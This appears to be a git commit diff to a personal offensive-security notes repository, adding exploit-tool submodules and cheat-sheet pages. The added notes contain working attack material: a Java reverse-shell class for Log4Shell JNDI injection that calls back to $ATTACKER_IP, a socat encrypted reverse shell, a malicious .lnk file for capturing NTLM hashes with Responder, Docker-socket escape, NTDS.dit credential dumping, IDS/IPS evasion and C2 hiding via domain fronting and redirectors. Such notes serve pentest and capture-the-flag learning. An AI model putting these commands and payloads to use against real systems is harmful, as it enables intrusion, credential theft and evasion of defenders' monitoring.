bump
This commit is contained in:
parent
32fa6a672b
commit
a3a6f09472
|
@ -139,3 +139,24 @@
|
||||||
[submodule "exploit/windows/printspoofer"]
|
[submodule "exploit/windows/printspoofer"]
|
||||||
path = exploit/windows/printspoofer
|
path = exploit/windows/printspoofer
|
||||||
url = https://github.com/dievus/printspoofer.git
|
url = https://github.com/dievus/printspoofer.git
|
||||||
|
[submodule "post_exploitation/powershell"]
|
||||||
|
path = post_exploitation/powershell
|
||||||
|
url = https://github.com/puckiestyle/powershell.git
|
||||||
|
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
|
||||||
|
path = enumeration/network_scanners/kotlin-port-scanner
|
||||||
|
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
|
||||||
|
[submodule "exploit/macOS/ds_store_exp"]
|
||||||
|
path = exploit/macOS/ds_store_exp
|
||||||
|
url = https://github.com/lijiejie/ds_store_exp.git
|
||||||
|
[submodule "exploit/macOS/DS_Store_crawler_parser"]
|
||||||
|
path = exploit/macOS/DS_Store_crawler_parser
|
||||||
|
url = https://github.com/anantshri/DS_Store_crawler_parser.git
|
||||||
|
[submodule "exploit/macOS/Python-dsstore"]
|
||||||
|
path = exploit/macOS/Python-dsstore
|
||||||
|
url = https://github.com/gehaxelt/Python-dsstore.git
|
||||||
|
[submodule "post_exploitation/armitage"]
|
||||||
|
path = post_exploitation/armitage
|
||||||
|
url = https://gitlab.com/kalilinux/packages/armitage.git
|
||||||
|
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
|
||||||
|
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
|
||||||
|
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
# LDAP
|
||||||
|
|
||||||
|
## Get Domain
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ldapsearch -x -h $TARGET_IP -s base namingcontexts
|
||||||
|
```
|
||||||
|
|
||||||
|
## Domain Dump
|
||||||
|
|
||||||
|
* If a set of credentials are known via
|
||||||
|
```sh
|
||||||
|
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
|
||||||
|
```
|
||||||
|
* Take a look at the genreated HTML files
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e
|
|
@ -1,6 +1,11 @@
|
||||||
# Evil-winrm
|
# Evil-winrm
|
||||||
|
|
||||||
|
|
||||||
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
|
||||||
```sh
|
```sh
|
||||||
download C:\Windows\Temp\<file>
|
download C:\Windows\Temp\<file>
|
||||||
```
|
```
|
||||||
|
* The other way
|
||||||
|
```
|
||||||
|
upload yadayda
|
||||||
|
```
|
||||||
|
|
|
@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
|
||||||
* A Proxy LDAP server to an HTTP server is needed
|
* A Proxy LDAP server to an HTTP server is needed
|
||||||
|
|
||||||
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
||||||
```sh
|
```java
|
||||||
public class Exploit {
|
public class Exploit {
|
||||||
static {
|
static {
|
||||||
try {
|
try {
|
||||||
|
@ -48,12 +48,52 @@ public class Exploit {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
or another one
|
||||||
|
```java
|
||||||
|
import java.io.InputStream;
|
||||||
|
import java.io.OutputStream;
|
||||||
|
import java.net.Socket;
|
||||||
|
|
||||||
|
public class Exploit {
|
||||||
|
static {
|
||||||
|
String host = "$ATTACKER_IP";
|
||||||
|
int port = 4711;
|
||||||
|
String cmd = "/bin/sh";
|
||||||
|
try {
|
||||||
|
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
|
||||||
|
Socket s = new Socket(host, port);
|
||||||
|
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
|
||||||
|
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
|
||||||
|
while (!s.isClosed()) {
|
||||||
|
while (pi.available() > 0)
|
||||||
|
so.write(pi.read());
|
||||||
|
while (pe.available() > 0)
|
||||||
|
so.write(pe.read());
|
||||||
|
while (si.available() > 0)
|
||||||
|
po.write(si.read());
|
||||||
|
so.flush();
|
||||||
|
po.flush();
|
||||||
|
Thread.sleep(50);
|
||||||
|
try {
|
||||||
|
p.exitValue();
|
||||||
|
break;
|
||||||
|
} catch (Exception e) {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
p.destroy();
|
||||||
|
s.close();
|
||||||
|
} catch (Exception e) {
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
* Run the LDAP, HTTP and reverse shell
|
* Run the LDAP, HTTP and reverse shell
|
||||||
```sh
|
```sh
|
||||||
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
||||||
```
|
```
|
||||||
```sh
|
```sh
|
||||||
php -S 0.0.0.:8000
|
php -S 0.0.0.0:8000
|
||||||
```
|
```
|
||||||
```sh
|
```sh
|
||||||
nc -lvnp 4449
|
nc -lvnp 4449
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 859781b834244774cb509e96ccc29ee646f72739
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7
|
|
@ -0,0 +1,14 @@
|
||||||
|
# .lnk exploit
|
||||||
|
|
||||||
|
* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
|
||||||
|
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
|
||||||
|
|
||||||
|
* Target does not even have to open the link directly
|
||||||
|
|
||||||
|
```sh
|
||||||
|
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
|
||||||
|
```
|
||||||
|
* Start a responder and wait for user's hash
|
||||||
|
```sh
|
||||||
|
responder -I eth0
|
||||||
|
```
|
|
@ -0,0 +1,57 @@
|
||||||
|
# Hadoop
|
||||||
|
|
||||||
|
Distributed storage and computing
|
||||||
|
* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
|
||||||
|
|
||||||
|
## Terminology
|
||||||
|
* __Cluster__, forms the datalake
|
||||||
|
* __Node__, single host inside the cluster
|
||||||
|
* __NameNode__, node that keeps the dir tree of the Hadoop file system
|
||||||
|
* __DataNode__, slave node that stores files and is instructed by the NameNode
|
||||||
|
* __Primary NameNode__, current active node responsible for keeping the directory structure
|
||||||
|
* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
|
||||||
|
* __Master Node__, Hadoop management app like HDFS or YARN Manager
|
||||||
|
* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
|
||||||
|
* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
|
||||||
|
* __Kerberised__, security enabled cluster through Kerberos
|
||||||
|
|
||||||
|
* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
|
||||||
|
* __Hive__, primary DB for structured data
|
||||||
|
* __YARN__, scheduling jobs and resource management
|
||||||
|
* __MapReduce__, distributed filtering, sorting and reducing
|
||||||
|
* __HUE__, GUI for HDFS and Hive
|
||||||
|
* __Zookeeper__, cluster management
|
||||||
|
* __Kafka__, message broker
|
||||||
|
* __Ranger__, privileged ACL
|
||||||
|
* __Zeppelin__, data analytivs inside a webUI
|
||||||
|
|
||||||
|
## Zeppelin
|
||||||
|
|
||||||
|
* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
|
||||||
|
* Try execution inside notebooks
|
||||||
|
|
||||||
|
## Ktabs
|
||||||
|
|
||||||
|
* Finding `ktpass`es to authenticate at the kerberos TGS
|
||||||
|
* Output principals and use them to init
|
||||||
|
```sh
|
||||||
|
klist -k <keytabfile>
|
||||||
|
kinit <prinicpal name> -k -V -t <keytabfile>
|
||||||
|
```
|
||||||
|
|
||||||
|
## HDFS
|
||||||
|
|
||||||
|
* User the `hdfs` utility to enumerate the distributed network storage
|
||||||
|
```sh
|
||||||
|
hdfs dfs -ls /
|
||||||
|
```
|
||||||
|
* Current user and user on the storage do not have to correspond
|
||||||
|
* Touched files on the storage may be owned by root
|
||||||
|
```sh
|
||||||
|
hdfs dfs -touchz testfile /tmp/testfile
|
||||||
|
hdfs dfs -ls /tmp
|
||||||
|
```
|
||||||
|
* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
|
||||||
```sh
|
```sh
|
||||||
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
|
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
|
||||||
```
|
```
|
||||||
* Login in to the host via ssh
|
* Login in to the host via ssh remotely or socat locally
|
||||||
|
```sh
|
||||||
|
socat - UNIX-CONNECT:/var/run/docker.sock
|
||||||
|
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Connection: Upgrade
|
||||||
|
Upgrade: tcp
|
||||||
|
|
||||||
|
HTTP/1.1 101 UPGRADED
|
||||||
|
Content-Type: application/vnd.docker.raw-stream
|
||||||
|
Connection: Upgrade
|
||||||
|
Upgrade: tcp
|
||||||
|
```
|
||||||
|
|
||||||
## Escape through DB
|
## Escape through DB
|
||||||
|
|
||||||
* Login into DB
|
* Login into DB
|
||||||
|
|
|
@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<J
|
||||||
```sh
|
```sh
|
||||||
puttygen <keyfile> -o key.ppk
|
puttygen <keyfile> -o key.ppk
|
||||||
```
|
```
|
||||||
|
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
|
||||||
|
```sh
|
||||||
|
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
|
||||||
|
```
|
||||||
|
|
||||||
### Socat
|
### Socat
|
||||||
* Reverse shell on target via
|
* Reverse shell on target via
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6
|
|
@ -2,3 +2,44 @@
|
||||||
|
|
||||||
* [Matrix](https://www.thec2matrix.com/)
|
* [Matrix](https://www.thec2matrix.com/)
|
||||||
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
|
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
|
||||||
|
* [Empire](https://github.com/BC-SECURITY/Empire.git)
|
||||||
|
* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
|
||||||
|
* [Covenant](https://github.com/cobbr/Covenant)
|
||||||
|
* [Sliver](https://github.com/BishopFox/sliver)
|
||||||
|
|
||||||
|
* Server
|
||||||
|
* Listener
|
||||||
|
* Payloads/Agents
|
||||||
|
* Staged/Dropper
|
||||||
|
* Stageless
|
||||||
|
* Beacons from Agents, disguised through jitter
|
||||||
|
* Modules
|
||||||
|
* Post Exploitation
|
||||||
|
* Pivoting
|
||||||
|
|
||||||
|
## Domain Fronting
|
||||||
|
|
||||||
|
* Use a Domain on the C2 server
|
||||||
|
* User Cloudflare to proxy the request and responses to and from the target
|
||||||
|
* Use HTTPs for channel encryption
|
||||||
|
|
||||||
|
## Profiles
|
||||||
|
|
||||||
|
* Server evaluates by custom user-agents to identify agents
|
||||||
|
|
||||||
|
## Types
|
||||||
|
|
||||||
|
* Std listener, TCP or UDP
|
||||||
|
* HTTP/HTTPS, counter FW
|
||||||
|
* DNS, if internet access of the target is flaky
|
||||||
|
* SMB, counter network segments
|
||||||
|
|
||||||
|
## Redirector
|
||||||
|
|
||||||
|
* Apache or nginx as reverse proxy in front of the c2 server
|
||||||
|
* FW is still needed in front of the redirector
|
||||||
|
* These get burned instead of the c2
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,79 @@
|
||||||
|
# IDS & IPS Evation
|
||||||
|
|
||||||
|
* Evation by manipulation of
|
||||||
|
* Protocol
|
||||||
|
* Payload
|
||||||
|
* Route
|
||||||
|
* Or DoS
|
||||||
|
|
||||||
|
## Protocol Manipulation
|
||||||
|
|
||||||
|
### Relying on another protocol
|
||||||
|
* `nc -ulvnp 4711` for listening to incoming UDP traffic
|
||||||
|
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
|
||||||
|
|
||||||
|
### Manipulation of the source's or LHOST's network port
|
||||||
|
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
|
||||||
|
|
||||||
|
### Session splicing by fragmentation and segmentation
|
||||||
|
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU
|
||||||
|
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
|
||||||
|
|
||||||
|
### Sending invalid packets
|
||||||
|
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
|
||||||
|
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
|
||||||
|
|
||||||
|
## Payload Manipulation
|
||||||
|
|
||||||
|
### Obfuscation and Encoding
|
||||||
|
* Base64
|
||||||
|
* URL
|
||||||
|
* Escaped Unicode Characters
|
||||||
|
|
||||||
|
### Encrypting Communication Channels
|
||||||
|
* Use socat with encryption
|
||||||
|
```sh
|
||||||
|
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
|
||||||
|
```
|
||||||
|
* Create `.pem` (Privacy Enhanced Mail) file via
|
||||||
|
```
|
||||||
|
cat id_rsa.key reverse.crt > reverse.pem
|
||||||
|
```
|
||||||
|
* Listening on attacker side
|
||||||
|
```sh
|
||||||
|
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
|
||||||
|
```
|
||||||
|
* On target
|
||||||
|
```sh
|
||||||
|
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
|
||||||
|
```
|
||||||
|
|
||||||
|
### Modification of Data
|
||||||
|
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
|
||||||
|
* Adding whitespaces to the commands
|
||||||
|
* Use aliases
|
||||||
|
|
||||||
|
## Route Manipulation
|
||||||
|
|
||||||
|
### Relying on Source Routing
|
||||||
|
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
|
||||||
|
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
|
||||||
|
|
||||||
|
### Using Proxyy Servers
|
||||||
|
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
|
||||||
|
|
||||||
|
## Tactical DoS
|
||||||
|
* Non malicious, benign traffic against
|
||||||
|
* IDS/IPS
|
||||||
|
* Logging server
|
||||||
|
|
||||||
|
## MISC
|
||||||
|
|
||||||
|
* Changing
|
||||||
|
* `User-Agent`
|
||||||
|
* Request frequency and duration of sleep
|
||||||
|
* SSL/TLS certs
|
||||||
|
* DNS beacon, storing exfiltrated data in the query
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
|
||||||
run -j
|
run -j
|
||||||
```
|
```
|
||||||
* Copy into powershell/cmd
|
* Copy into powershell/cmd
|
||||||
|
|
||||||
|
|
||||||
|
## Reverse Proxy
|
||||||
|
|
||||||
|
* Hide behind reverse proxy, e.g. apache
|
||||||
|
* In case of an apache, these modules must be enabled
|
||||||
|
* rewrite
|
||||||
|
* proxy
|
||||||
|
* proxy_http
|
||||||
|
* headers
|
||||||
|
* Use `User-Agent` to identify targets
|
||||||
|
```ucl
|
||||||
|
<VirtualHost *:80>
|
||||||
|
|
||||||
|
ServerAdmin webmaster@localhost
|
||||||
|
DocumentRoot /var/www/html
|
||||||
|
|
||||||
|
RewriteEngine On
|
||||||
|
RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
|
||||||
|
ProxyPass "/" "http://localhost:8080/"
|
||||||
|
|
||||||
|
<Directory>
|
||||||
|
AllowOverride All
|
||||||
|
</Directory>
|
||||||
|
|
||||||
|
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||||
|
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||||
|
|
||||||
|
</VirtualHost>
|
||||||
|
```
|
||||||
|
|
|
@ -6,21 +6,21 @@
|
||||||
* Check `whoami /all`
|
* Check `whoami /all`
|
||||||
* `SeBackupPrivilege` must be present
|
* `SeBackupPrivilege` must be present
|
||||||
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
|
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
|
||||||
* Upload `diskshadow.txt` to the target with the following content
|
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
|
||||||
```sh
|
```sh
|
||||||
set metadata C:\tmp\tmp.cabs
|
set metadata C:\tmp\tmp.cabs
|
||||||
set context persistent nowriters
|
set context persistent nowriters
|
||||||
add volume c: alias someAlias
|
add volume c: alias someAlias
|
||||||
create
|
create
|
||||||
expose %someAlias% h:
|
expose %someAlias% h:
|
||||||
```
|
```
|
||||||
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
|
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
|
||||||
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
|
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
|
||||||
```sh
|
```sh
|
||||||
import-module .\SeBackupPrivilegeUtils.dll
|
import-module .\SeBackupPrivilegeUtils.dll
|
||||||
import-module .\SeBackupPrivilegeCmdLets.dll
|
import-module .\SeBackupPrivilegeCmdLets.dll
|
||||||
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
|
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
|
||||||
reg save HKLM\SYSTEM C:\Path\to\uploads\system
|
reg save HKLM\SYSTEM C:\tmp\system
|
||||||
```
|
```
|
||||||
* Downloads the files `ntds.dit` and `system`
|
* Downloads the files `ntds.dit` and `system`
|
||||||
* Extract the hashes via
|
* Extract the hashes via
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b
|
Loading…
Reference in New Issue